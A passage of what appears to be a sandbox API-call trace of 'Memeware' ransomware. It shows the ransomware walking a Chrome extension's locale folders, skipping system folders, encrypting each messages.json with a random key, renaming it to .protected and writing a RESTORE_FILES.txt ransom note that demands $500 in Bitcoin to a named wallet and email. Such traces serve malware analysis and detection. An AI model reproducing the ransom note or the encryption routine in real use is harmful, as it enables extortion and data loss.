pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected") returned 165 [0080.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.protected")) returned 1 [0080.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.517] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\RESTORE_FILES.txt") returned 159 [0080.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.517] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.517] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.518] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.518] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.518] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.518] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.519] CloseHandle (hObject=0x164) returned 1 [0080.519] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0080.519] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu") returned 141 [0080.519] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0080.519] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0080.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*") returned 143 [0080.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.519] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\.") returned 143 [0080.519] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.519] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.519] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.519] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.520] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\..") returned 144 [0080.520] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.520] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.520] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.520] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.520] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.520] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json") returned 155 [0080.521] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.521] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.522] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.522] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.522] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.522] CloseHandle (hObject=0x168) returned 1 [0080.522] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected") returned 165 [0080.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.protected")) returned 1 [0080.523] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.523] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.523] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0080.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.523] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.523] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.524] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.524] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.524] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.524] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.524] CloseHandle (hObject=0x164) returned 1 [0080.524] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Windows") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Program Files") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="Program Files (x86)") returned -1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="$Recycle.bin") returned 1 [0080.524] lstrcmpiW (lpString1="hy", lpString2="System Volume Information") returned -1 [0080.524] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy") returned 141 [0080.524] lstrcmpW (lpString1="hy", lpString2=".") returned 1 [0080.524] lstrcmpW (lpString1="hy", lpString2="..") returned 1 [0080.524] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*") returned 143 [0080.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\.") returned 143 [0080.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\..") returned 144 [0080.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.525] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.525] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.525] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json") returned 155 [0080.526] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.526] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x299, lpOverlapped=0x0) returned 1 [0080.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x299, lpOverlapped=0x0) returned 1 [0080.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.527] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.527] CloseHandle (hObject=0x168) returned 1 [0080.527] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected") returned 165 [0080.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 